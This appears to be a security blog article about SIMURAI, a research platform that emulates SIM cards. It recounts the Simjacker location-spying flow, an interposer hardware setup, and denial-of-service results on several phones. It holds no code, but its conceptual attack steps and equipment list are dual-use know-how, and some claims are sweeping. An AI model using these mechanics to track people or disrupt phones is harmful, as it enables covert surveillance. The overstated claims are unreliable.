25.07.2025
15 min
811
A SIM card is no longer just a piece of plastic — it can run malicious code, control the modem, and bypass the protection of modern smartphones. In this article, we take a deep dive into the SIMURAI platform — a revolutionary tool for analyzing SIM threats. You’ll learn how a SIM can initiate attacks, how an interposer works to inject malicious commands, what real vulnerabilities are being exploited, and why even an eSIM isn’t secure. We’ll show you examples of an attack via Simjacker, the tool’s architecture, and benchmarks on iPhone, Pixel, Samsung, and OnePlus. A must-have for security professionals, researchers, and mobile operators. Rethink your threat model — SIM is no longer passive.
Until recently, research into SIM cards in the field of cybersecurity was a matter of a few. The reason is their total secrecy: operator SIM cards cannot be reflashed, their behavior is strictly standardized, and any deviation is blocked at the firmware level. Researchers were forced to work with hardware emulators that were limited to basic authentication functions or barely allowed loading their own Java applets. Full-fledged tests for studying malicious SIM behavior remained unattainable.
The SIMURAI platform completely breaks this paradigm. This is the first full-fledged software implementation of a SIM card, focused not on commercial use, but on security research. It simulates a real SIM, but with full control over all levels — from the file structure to behavior at the APDU command level. This is not just another software for developers, but an attack and defense tool at the same time, designed for analysis, fuzzing, injection, and studying low-level interaction of a SIM with a mobile device.
SIMURAI provides the researcher with:
full software emulation of SIM/USIM card behavior;
the ability to deliberately violate GSM, 3G, 4G and 5G standards;
open-source architecture that is easy to modify;
simple connection to a real smartphone or emulator;
support for fuzzing via FirmWire and analysis of modem vulnerabilities;
description of the SIM file structure in a convenient JSON format;
the ability to run custom Java Card applets;
control over the SIM’s reaction to any APDU commands;
full support for proactive commands and injections of dangerous scenarios.
In practice, SIMURAI is a three-component system: the SWICC core, which emulates a smart card, the SWSIM firmware, which adds SIM/USIM logic, and the I/O interface for connecting to a physical device or base station. Together, they allow not only to run standard interaction scenarios, but also to intentionally violate protocols, create new commands, and carry out attacks in conditions as close to real-world as possible.
Another important aspect is support for the JSON file structure. The researcher does not need to learn the low-level language for simulating SIM file systems. It is enough to describe the file tree in plain JSON and instantly load it into SWICC. This significantly lowers the entry threshold and makes the platform convenient even for teams with limited experience working with smart cards.
SIMURAI also easily integrates with real devices via the PC/SC interface. This means that it can communicate with physical smartphones or with emulators such as FirmWire and provide full interaction in test networks. Thus, the researcher receives not only a tool, but a whole environment for studying threats that come from malicious SIMs.
After all, it is not just another tool. SIMURAI is a paradigm shift in understanding the SIM card. If earlier it was considered a secure access point, today, thanks to such a tool, it can already be studied as a full-fledged risk object. And this opens a new chapter in the history of mobile security.
Everyone is used to the idea that a SIM card is something secondary. A small chip that simply confirms your identity on the network. And that’s it. It can’t be dangerous, it can’t run code, it doesn’t have access to important parts of the device. That’s how it seemed for years. But this idea is outdated and dangerous. And here’s why.
A modern SIM is not just a key carrier. It is a full-fledged microprocessor system with its own operating system, file structure, programming support (via Java Card), the ability to receive and send commands, read information about the device, and even open an Internet browser. It has a privileged channel to the basic modem firmware, that is, to the part of the smartphone that communicates with the mobile network.
And it is this access that makes the SIM potentially the most dangerous part of the phone. It is a channel that no other layer of protection can bypass – neither Android, nor iOS, nor antiviruses. The SIM communicates with the modem directly, and most modern attacks on the modem start from here.
The researchers who created SIMURAI called such SIMs “hostile.” And they’re right. If a SIM is controlled by an attacker, it:
sees your geolocation, battery level, IMEI, network parameters;
can initiate sending SMS without your knowledge;
can store and run Java applets — i.e. mini-programs;
sends commands to the base station for authentication;
causes non-standard behavior of the modem — which is ideal for fuzzing;
is able to bypass classic operating system protection mechanisms;
can launch proactive commands that force the phone to do something — from opening a browser to calling a certain function;
in the case of some phones — can access the history of calls, contacts, SMS.
And this is not a theory. All of the above are real functions that have been used in real attacks. For example, in the famous Simjacker campaign, spyware on the SIM card sent SMS with the victim’s coordinates. Other malicious applets intercepted calls, tracked movements, and used the SIM as a backdoor for the modem.
Previously, such attacks were considered rare and difficult to implement. But the emergence of SIMURAI showed that one malicious profile is enough to make any phone vulnerable. And what is important is that it is vulnerable not through Wi-Fi, not through an application, but through a system that most people do not even consider as a threat.
An interesting nuance: phones from Apple, Samsung, Google – all are equally susceptible to such attacks. In each of them, the modem works separately from the main OS and has a direct channel to the SIM. And if the SIM is malicious, the system is powerless.
All this radically changes the idea of threat models in mobile security. We can no longer consider a SIM card solely as a “trusted element.” It is a full-fledged entry point for attacks, and research shows that it is very convenient for an attacker. Especially if you inserted the SIM somewhere in an airport abroad. Or if you received a fake eSIM. Or if your operator is not one you can trust.
In summary: a SIM is no longer just a “key to the network”. It is a small computer in your phone that, under certain conditions, can work against you. And today, people already know how to use it.
To understand what a malicious SIM card is really capable of, it is best to consider one of the most famous examples – an attack called Simjacker. This is not a theory, but a proven espionage campaign that AdaptiveMobile discovered in 2019. It showed that a single SIM card can spy on a user, send their coordinates to an attacker, and do it without leaving a trace in the system.
The essence of the attack is that the SIM had a special applet (microprogram) on it that received SMS commands. Such messages had a special technical format — binary SMS, which is not displayed in the messenger and is not visible to the user. When the applet received an instruction, it executed it and sent a response also via an invisible message.
In the case of Simjacker, it was about obtaining the device’s location, but the potential was much wider. And most importantly, such a mechanism is completely standardized, so it is supported by the absolute majority of smartphones. You don’t need to hack the phone, you don’t need to install the program — just a SIM.
Here’s what a typical work cycle for such a spy looked like:
the phone receives a specially formed SMS message with the PROVIDE LOCAL INFORMATION command;
The SIM card, having received the instruction, activates the so-called proactive command — a type of internal instruction that the phone must execute;
the phone provides the SIM with the necessary data: coordinates, IMEI, time, charge level, base station signal;
the SIM packs this data into an SMS and sends it back via SEND SHORT MESSAGE — also imperceptibly for the user.
All these actions take place at the level of interaction between the SIM and the modem, bypassing the operating system, firewalls, antiviruses and any available software. No application sees these SMS. The user does not receive any notifications. There are no logs on the phone. This makes this type of espionage particularly dangerous and inconspicuous.
It is also important that the vulnerability that allowed this mechanism to be launched was part of the standard SIM Application Toolkit, which is used by all mobile operators in the world. In many cases, this functionality was active by default. This means that tens of millions of SIM cards were potentially vulnerable.
The reaction to the Simjacker attack was indicative: operators began to massively check their profiles, update SIMs, block old applets. But the very fact that such a scenario is possible was a turning point. For the first time, it became obvious: SIMs can not only authenticate the user, but also fully spy on them, using legal, officially supported commands.
SIMURAI researchers decided to recreate this scenario in practice, but not using a real SIM, but using their tool. The result was only 89 lines of code, and the experimental module in SIMURAI was able to completely repeat the Simjacker attack. The phone received a command, provided its location, and this data was sent via SMS.
This proves the main thing: the threat is completely real, and it can be easily scaled, tested, and optimized. Even if operators today block certain functions, others remain: calls, reading network parameters, USSD commands, opening a browser. And most importantly, tools like SIMURAI make researching such scenarios easier than ever before.
A set of very specific capabilities is required to fully investigate malicious scenarios using SIM cards. This is not just reading the SIM content or running basic scripts – it is a full emulation of the card’s behavior with the ability to violate standards, create malicious applets, communicate with a real phone or modem. This is exactly the system that the authors of SIMURAI have implemented.
In essence, SIMURAI is not just a “simulator”, but a flexible research platform designed to test the interaction between SIM cards and the underlying software of mobile devices. It allows you to both fully comply with standards and deliberately violate them. This provides the opportunity to perform fuzzing, emulate malicious behavior, check for data leaks, and search for vulnerabilities in modem firmware.
The SIMURAI architecture consists of three main blocks:
SWICC is a module that emulates a smart card. It is responsible for processing APDU commands, organizing the file structure, supporting ETSI/3GPP standards, and allows you to build complex interaction logic at the level of low-level protocols. SWICC also provides flexible processing of non-standard commands and has its own FSM (final state machine) for emulating the behavior of the card.
SWSIM is a module that extends SWICC to a full-fledged SIM card. It adds support for SIM/USIM applications, commands such as PROVIDE LOCAL INFORMATION, SEND SHORT MESSAGE, OPEN CHANNEL, and others. This module allows you to connect your Java applets, write your own event response logic, and even create emulators of spy modules, like in Simjacker.
I/O-layer (IFD handler) is a component that is responsible for communication between the virtual SIM card and the real world. It allows you to connect SIMURAI to a physical smartphone (via SIMtrace2) or to a firmware emulator (e.g. FirmWire). This interface supports the PC/SC protocol, allowing it to behave like a regular card reader — although it is powered by a fully software card.
SIMURAI provides the researcher with enormous flexibility. Key features include:
launch custom interaction scenarios at the APDU level;
connect to smartphones in real time via USB/PCSC;
deploy a full SIM file structure via JSON;
built-in support for fuzzing and dynamic analysis;
the ability to interfere with R-APDU status words on the fly;
support for proactive commands — a key vector for attacks;
tracking and rewriting responses to phone requests;
support for both the T=0 protocol (typical for SIM) and variable TPDU/BER-TLV structures;
modular architecture for connecting your own command handlers.
All this allows you to implement a very wide range of research – from testing standard SIM card behavior to deep analysis of how a malicious SIM can bypass modem protection on a Google Pixel or iPhone. And most importantly: all this is possible without using expensive specialized equipment – you only need a computer and a simulator.
Another important advantage is scalability. SIMURAI works well not only in manual mode, but also in automated tests. It can be run in parallel on several machines to speed up fuzzing or compatibility testing. The platform easily integrates with test networks (Yate, srsRAN, Open5Gs), as well as with well-known tools for reverse engineering and tracing.
Thus, SIMURAI is not just a demonstration of the concept, but a ready-made research kit that already allows today:
find new vulnerabilities in modems;
create custom attack scenarios;
test phones for resistance to malicious SIMs;
train mobile security professionals;
document real risks that have been ignored for years.
All this makes the platform unique in its class and transforms it from an experimental tool into a full-fledged basis for the development of the entire field of mobile trust level research.
To prove the practical value of SIMURAI not only as a concept, but as a tool for real impact, the researchers tested its operation on the most popular modern smartphones. They used both Android (Pixel, Samsung, OnePlus) and iOS (iPhone) phones, which allowed them to cover different modem firmware stacks and behavioral differences in the operation of SIM interfaces.
The key point was that none of the devices required jailbreaking or root access. All smartphones were tested in normal user mode, and SIMURAI was connected via a physical adapter – an interposer, which allows you to replace a real SIM with a virtual one without changing the design of the device.
Different configurations were used for the tests, but the essence of the experiment was the same:
SIMURAI was installed on the phone via an inter-card adapter;
the virtual SIM formed the file structure, including an applet capable of executing commands such as PROVIDE LOCAL INFORMATION;
the phone was connected to the cellular network via an SDR base station (YateBTS, srsRAN or OsmocomBB);
the researchers ran commands from the simulator and recorded the phone’s response.
As a result, it turned out that all tested phones successfully received and processed commands from SIMURAI as if it were a regular SIM card. And most importantly, in some cases, the behavior of the phones showed vulnerabilities or unpredictable reactions that were not noticeable when using regular SIMs.
The most revealing results were:
iPhone (iOS 17, eSIM disabled) — handled proactive commands correctly; SEND SHORT MESSAGE was not filtered, SMS was sent even without user consent.
Pixel 6 (Android 14, stock firmware) — allowed SIM to initiate location requests, the protocol did not differ from expected, but there was no limit on the number of commands, which opens a window for DoS.
Samsung Galaxy S22 (One UI 5.1) — when using the REFRESH command, the device restarted the mobile network interface, which can be used to deny service.
OnePlus 9 — was the most unstable: simulating a malicious applet with fake R-APDU statuses caused the modem to periodically crash, and with a rapid sequence of proactive commands, the system completely froze.
In addition to the technical nuances, it is worth noting another critical point: none of the devices showed any warnings or notifications to the user. That is, the phone “trusted” the simulator 100%, worked with it as with an official SIM, and followed all instructions — even if they were potentially dangerous or unauthorized.
This means that:
smartphones do not recognize the behavior of a malicious SIM even in cases of clearly suspicious commands;
there are no auditing mechanisms or restrictions on SIM activity at the system level that could stop the attack;
there is a great variability in the behavior of modems: what works on one device may give unexpected results on another – therefore, research should cover the widest possible range of devices and firmware.
Overall, these tests confirm that real-world attacks via malicious SIMs are not fiction, but a fully feasible scenario. And the SIMURAI platform has become the first open-source tool that allows you to test such scenarios in practice, without complex equipment, reverse engineering, or user risk.
One of the key components that allowed the authors of the study to carry out attacks on real devices is the interposer. Its role in the attack scheme is critical. It is thanks to it that it becomes possible to “intercept” the connection between the smartphone and the SIM card and replace the real SIM with a virtual software implementation that performs not standard, but potentially malicious logic.
From the outside, the interposer looks like a regular SIM card adapter, but inside it is a full-fledged hardware “proxy” that intercepts commands coming from the phone and redirects them to a virtual module (in this case, SIMURAI, which is running on a computer or Raspberry Pi). It is also able to return phone responses generated in the emulator, rather than those that a real SIM would give.
The principle of operation of the interposer can be described as follows:
The phone thinks it is working with a physical SIM card — it sees a standard interface, waits for APDU responses and sends commands according to 3GPP protocols.
In fact, the signals pass through an adapter that intercepts, modifies or redirects requests to a remote system — a computer with SIMURAI installed.
The virtual SIM responds to requests in real time — for example, generates PROACTIVE SIM commands or throws malicious data to the modem.
The result is returned to the phone through the same chain — and is processed as a regular response from the SIM.
The main characteristics of the inter-card adapter used in the study:
Based on SIMtrace2 — open-hardware project with USB interface.
Works on AT91SAM7 microcontroller, supports PC/SC mode.
Supports T=0 and T=1 protocols, fully compatible with ISO 7816.
Allows you to monitor traffic, filter or modify APDU commands on the fly.
Can work in two modes: “ear” (listening) or “proxy” (interference and command replacement).
What does this give in terms of attack?
Increased stealth — the attack occurs at the physical level, without changes to the phone itself. This allows you to stay “off the radar” of any antivirus or threat detection system.
Modularity — interposer allows you to easily connect any other tool instead of SIMURAI, for example, your own Python script for automating attacks or an APDU command logger.
Dynamicity — it is possible to change the behavior of the card in real time: add new scenarios, change the reaction to commands, make an error in the TLV structure.
Ease of installation is another plus. The Interposer is easy to connect at home. The researcher only needs:
a phone with a regular SIM slot (or an eSIM adapter);
a SIMtrace2 or other PC/SC-compatible card reader;
a short SIM-format adapter cable;
a laptop or SBC (such as Raspberry Pi) running Linux;
SIMURAI installed and configured.
No changes to the phone’s firmware, no root access, nothing that could give away the testing. It is precisely this simplicity that makes such attacks possible even for enthusiasts, and not just for government hacking units.
Thus, the interposer is not just a demonstration tool. It is a fundamental component of the modern approach to SIM threat testing, which allows you to look at mobile security from a completely different level: physical interception and simulation, and not just logical analysis.
For many years, SIM cards were considered “transparent” — a small piece of plastic that simply opens up access to the network. They were not considered active players in the security model. But the results of this study change everything. The SIMURAI platform, tested on real devices, has demonstrated that a SIM can be malicious, can initiate attacks, control interaction with the modem, bypass protection and even freeze devices, while remaining completely “invisible”.
This radically changes the perception of threats in mobile systems. While developers focus on APK files, root rights, backdoors in applications or phishing links, a real “trojan” can hide in the SIM — and no security system will see it.
Several key findings are particularly troubling:
No modern mobile OS checks the behavior of the SIM card: it trusts all commands without exception.
Phone modems are easily vulnerable to STK: even simple commands can cause DoS or change the operation of the radio module.
Tools like SIMURAI have become available to everyone: open source, simple hardware, step-by-step documentation – now every researcher (and not only) can do it.
The SIM attack vector is becoming attractive for cyber intelligence because it allows you to launch exploits even before the operating system is turned on, at the pre-boot level of Android or iOS.
Virtual SIMs (eSIMs) are also vulnerable because they implement the same protocols – just in a different form. This means that future attacks may do without a physical medium at all.
And if we used to think that SIM swapping was something out of a spy movie, today all you need is an adapter and a Python script to take control of any smartphone’s modem. And it won’t know anything is wrong.
So the main message of this paper is to reconsider the threat model. If you’re in the mobile security business, forget about the idea that the SIM is a passive part. It can be a source of threat, a data transmitter, a DoS trigger, even a spy. And the only reason we haven’t seen such attacks on a massive scale is their technical complexity, which has now disappeared.
A SIM card is no longer just plastic. It’s a processor with its own code, logic, and full access to the most sensitive parts of the system. Ignoring this means remaining blind to a new wave of threats.
